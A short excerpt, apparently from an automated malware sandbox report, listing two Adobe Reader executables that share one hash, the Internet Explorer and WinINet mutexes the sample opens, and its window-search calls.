C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
Behavior description: Opens mutex
details:ShimCacheMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
Local\!IETld!Mutex
Local\c:!documents and settings!administrator!ietldcache!
Behavior description: Searches for specified window
details:NtUserFindWindowEx: [Class,Window] = [,]
NtUserFindWindowEx: [Class,Window] = [msctls_statusbar32,]